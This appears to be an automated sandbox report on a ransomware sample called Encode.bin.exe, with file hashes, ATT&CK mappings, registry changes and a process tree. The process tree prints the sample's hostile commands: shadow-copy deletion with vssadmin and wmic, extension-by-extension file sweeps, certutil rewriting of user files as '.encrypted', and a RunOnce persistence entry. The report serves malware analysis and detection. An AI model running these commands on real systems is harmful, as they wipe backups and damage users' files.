3b60577fe6abb4637b2d1bee5b3d47f70f7230ace340d712a9c7fb1a642688b4

General

Target

Encode.bin.exe
Size

153KB
MD5

5163f03f6789656605108bec4650b66f
SHA1

c32e012da9257780d2031f683457da1840615c9c
SHA256

fb3b67d7f94630f41e722de49c211d8f5c69cdec8fc9ba25996717a77f67b89b
SHA512

13f0a1223330676bf5b81ee6fe64c963bcbeedb5589c96759573919a3e47aaf2e3b387edf2aa99cbded1f086df320cf0e03c06ba1f88f0a06a67014e3552cece

Score

9^/10

persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Encode.bin.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	Encode.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Encode.bin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

568 vssadmin.exe

pid	process
568	vssadmin.exe

Modifies registry class 13 IoCs

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\edit	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\edit\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\edit\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\open	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\.encrypted	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\.encrypted\ = "encrypted_auto_file"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\encrypted_auto_file\shell\open\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"	rundll32.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

vssvc.exeWMIC.exe

description	pid	process
Token: SeBackupPrivilege	636	vssvc.exe
Token: SeRestorePrivilege	636	vssvc.exe
Token: SeAuditPrivilege	636	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1876	WMIC.exe
Token: SeSecurityPrivilege	1876	WMIC.exe
Token: SeTakeOwnershipPrivilege	1876	WMIC.exe
Token: SeLoadDriverPrivilege	1876	WMIC.exe
Token: SeSystemProfilePrivilege	1876	WMIC.exe
Token: SeSystemtimePrivilege	1876	WMIC.exe
Token: SeProfSingleProcessPrivilege	1876	WMIC.exe
Token: SeIncBasePriorityPrivilege	1876	WMIC.exe
Token: SeCreatePagefilePrivilege	1876	WMIC.exe
Token: SeBackupPrivilege	1876	WMIC.exe
Token: SeRestorePrivilege	1876	WMIC.exe
Token: SeShutdownPrivilege	1876	WMIC.exe
Token: SeDebugPrivilege	1876	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1876	WMIC.exe
Token: SeRemoteShutdownPrivilege	1876	WMIC.exe
Token: SeUndockPrivilege	1876	WMIC.exe
Token: SeManageVolumePrivilege	1876	WMIC.exe
Token: 33	1876	WMIC.exe
Token: 34	1876	WMIC.exe
Token: 35	1876	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Encode.bin.execmd.exe

description	pid	process	target process
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	cmd.exe
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	cmd.exe
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	cmd.exe
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	cmd.exe
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	cmd.exe
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	cmd.exe
PID 1032 wrote to memory of 1232	1032	Encode.bin.exe	cmd.exe
PID 1232 wrote to memory of 1864	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1864	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1864	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1864	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1864	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1864	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1864	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1712	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1712	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1712	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1712	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1712	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1712	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1712	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1732	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1732	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1732	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1732	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1732	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1732	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1732	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1752	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1752	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1752	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1752	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1752	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1752	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1752	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1692	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1692	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1692	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1692	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1692	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1692	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1692	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1404	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1404	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1404	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1404	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1404	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1404	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1404	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1308	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1308	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1308	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1308	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1308	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1308	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 1308	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 844	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 844	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 844	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 844	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 844	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 844	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 844	1232	cmd.exe	certutil.exe
PID 1232 wrote to memory of 1596	1232	cmd.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\Encode.bin.exe
"C:\Users\Admin\AppData\Local\Temp\Encode.bin.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\SysWOW64\cmd.exe
cmd /c "Encode.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:1232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.txt
3⤵
PID:1864

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Desktop\ALL-YOUR-FILES-ARE-ENCRYPTED.txt" "C:\Users\Admin\Desktop\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted"
3⤵
PID:1712

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Desktop\UpdateConvertTo.txt" "C:\Users\Admin\Desktop\UpdateConvertTo.txt.encrypted"
3⤵
PID:1732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.doc
3⤵
PID:1752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.bat
3⤵
PID:1692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.vbs
3⤵
PID:1404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.cmd
3⤵
PID:1308

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Desktop\AddExport.cmd" "C:\Users\Admin\Desktop\AddExport.cmd.encrypted"
3⤵
PID:844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.html
3⤵
PID:1596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.rtf
3⤵
PID:1468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.txt
3⤵
PID:1532

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Downloads\ALL-YOUR-FILES-ARE-ENCRYPTED.txt" "C:\Users\Admin\Downloads\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted"
3⤵
PID:1632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.doc
3⤵
PID:320

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Downloads\ConvertToDisconnect.doc" "C:\Users\Admin\Downloads\ConvertToDisconnect.doc.encrypted"
3⤵
PID:524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.bat
3⤵
PID:1036

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Downloads\OutShow.bat" "C:\Users\Admin\Downloads\OutShow.bat.encrypted"
3⤵
PID:1516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.vbs
3⤵
PID:1584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.cmd
3⤵
PID:804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.html
3⤵
PID:1876

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Downloads\ImportUpdate.html" "C:\Users\Admin\Downloads\ImportUpdate.html.encrypted"
3⤵
PID:620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.rtf
3⤵
PID:1320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.txt
3⤵
PID:456

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Documents\ALL-YOUR-FILES-ARE-ENCRYPTED.txt" "C:\Users\Admin\Documents\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted"
3⤵
PID:1040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.doc
3⤵
PID:660

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Documents\Are.docx" "C:\Users\Admin\Documents\Are.docx.encrypted"
3⤵
PID:1552

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Documents\Files.docx" "C:\Users\Admin\Documents\Files.docx.encrypted"
3⤵
PID:956

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Documents\Opened.docx" "C:\Users\Admin\Documents\Opened.docx.encrypted"
3⤵
PID:748

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Documents\Recently.docx" "C:\Users\Admin\Documents\Recently.docx.encrypted"
3⤵
PID:1612

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Documents\These.docx" "C:\Users\Admin\Documents\These.docx.encrypted"
3⤵
PID:1960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.bat
3⤵
PID:1864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.vbs
3⤵
PID:1764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.cmd
3⤵
PID:1296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.html
3⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.rtf
3⤵
PID:608

C:\Windows\SysWOW64\certutil.exe
certutil -encode "C:\Users\Admin\Documents\DisconnectNew.rtf" "C:\Users\Admin\Documents\DisconnectNew.rtf.encrypted"
3⤵
PID:1284

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:568

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic.exe SHADOWCOPY /nointeractive
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Documents\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted
1⤵
- Modifies registry class
PID:1688

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted
2⤵
PID:1248

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Encode.bat
MD5
32c894f2e4b05e4f95fded0e24fc0766

SHA1
bf3cb912816989a30a6de15388d5724d217c30aa

SHA256
b88022b7806a7b7e9ff01a4b106eff554d43729991249b1795bdb0b0eaa96955

SHA512
cd7869c7456e1742842b0eaf8efe2755fa740638ed56ff621a4bb52e924f15bb4d4a21595da85e05bf36434060b0018e918cfd95cd0c87fb33bf03d944332529

Download Submit
C:\Users\Admin\Desktop\ALL-YOUR-FILES-ARE-ENCRYPTED.txt
MD5
72c1626115909c7f77d3bf9c4d23102f

SHA1
3500ae5a375aa0e561d675c388830791abf0dcd9

SHA256
d4c5cbc1f36d4c74d1de30676d8bc5a61d7ced607a293ab659c7f4507e22787b

SHA512
ec71515cccdffe4f1e80bf8cafcfe72ff1ed5070525f2abb7ddffc2b9b530e380fea4b45f74ae1f05c55f93cd7bcf95309d338c29a3a38e15d7830024644a404

Download Submit
C:\Users\Admin\Documents\ALL-YOUR-FILES-ARE-ENCRYPTED.txt
MD5
72c1626115909c7f77d3bf9c4d23102f

SHA1
3500ae5a375aa0e561d675c388830791abf0dcd9

SHA256
d4c5cbc1f36d4c74d1de30676d8bc5a61d7ced607a293ab659c7f4507e22787b

SHA512
ec71515cccdffe4f1e80bf8cafcfe72ff1ed5070525f2abb7ddffc2b9b530e380fea4b45f74ae1f05c55f93cd7bcf95309d338c29a3a38e15d7830024644a404

Download Submit
C:\Users\Admin\Documents\ALL-YOUR-FILES-ARE-ENCRYPTED.txt.encrypted
MD5
f0e10ec2c2fc8de94738338dda195eb0

SHA1
7130dcd18e4df464dc2952a62b0d6870b3bd0f44

SHA256
849c3bee965112d973a9ba4802d48835255ef704046d3e8c3b6b74584c693455

SHA512
4f25eb82e15161d5ef67a75d7c23f4f5d298b601029882c61457ec88556c07eed2f7d6cdb2ff1400890c92ed031c5a96b2a1e0e2d4cf2c476f157dc0420d5c42

Download Submit
C:\Users\Admin\Downloads\ALL-YOUR-FILES-ARE-ENCRYPTED.txt
MD5
72c1626115909c7f77d3bf9c4d23102f

SHA1
3500ae5a375aa0e561d675c388830791abf0dcd9

SHA256
d4c5cbc1f36d4c74d1de30676d8bc5a61d7ced607a293ab659c7f4507e22787b

SHA512
ec71515cccdffe4f1e80bf8cafcfe72ff1ed5070525f2abb7ddffc2b9b530e380fea4b45f74ae1f05c55f93cd7bcf95309d338c29a3a38e15d7830024644a404

Download Submit
memory/320-90-0x0000000000000000-mapping.dmp

Download
memory/456-108-0x0000000000000000-mapping.dmp

Download
memory/524-92-0x0000000000000000-mapping.dmp

Download
memory/568-137-0x0000000000000000-mapping.dmp

Download
memory/608-133-0x0000000000000000-mapping.dmp

Download
memory/620-104-0x0000000000000000-mapping.dmp

Download
memory/660-113-0x0000000000000000-mapping.dmp

Download
memory/748-119-0x0000000000000000-mapping.dmp

Download
memory/804-100-0x0000000000000000-mapping.dmp

Download
memory/844-79-0x0000000000000000-mapping.dmp

Download
memory/956-117-0x0000000000000000-mapping.dmp

Download
memory/1032-60-0x0000000075591000-0x0000000075593000-memory.dmp

Filesize
8KB

Download
memory/1036-94-0x0000000000000000-mapping.dmp

Download
memory/1040-110-0x0000000000000000-mapping.dmp

Download
memory/1232-61-0x0000000000000000-mapping.dmp

Download
memory/1248-142-0x0000000000000000-mapping.dmp

Download
memory/1284-135-0x0000000000000000-mapping.dmp

Download
memory/1296-129-0x0000000000000000-mapping.dmp

Download
memory/1308-77-0x0000000000000000-mapping.dmp

Download
memory/1320-106-0x0000000000000000-mapping.dmp

Download
memory/1404-75-0x0000000000000000-mapping.dmp

Download
memory/1468-83-0x0000000000000000-mapping.dmp

Download
memory/1500-131-0x0000000000000000-mapping.dmp

Download
memory/1516-96-0x0000000000000000-mapping.dmp

Download
memory/1532-85-0x0000000000000000-mapping.dmp

Download
memory/1552-115-0x0000000000000000-mapping.dmp

Download
memory/1584-98-0x0000000000000000-mapping.dmp

Download
memory/1596-81-0x0000000000000000-mapping.dmp

Download
memory/1612-121-0x0000000000000000-mapping.dmp

Download
memory/1632-87-0x0000000000000000-mapping.dmp

Download
memory/1688-141-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

Filesize
8KB

Download
memory/1692-73-0x0000000000000000-mapping.dmp

Download
memory/1712-66-0x0000000000000000-mapping.dmp

Download
memory/1732-69-0x0000000000000000-mapping.dmp

Download
memory/1752-71-0x0000000000000000-mapping.dmp

Download
memory/1764-127-0x0000000000000000-mapping.dmp

Download
memory/1864-64-0x0000000000000000-mapping.dmp

Download
memory/1864-125-0x0000000000000000-mapping.dmp

Download
memory/1876-139-0x0000000000000000-mapping.dmp

Download
memory/1876-102-0x0000000000000000-mapping.dmp

Download
memory/1960-123-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads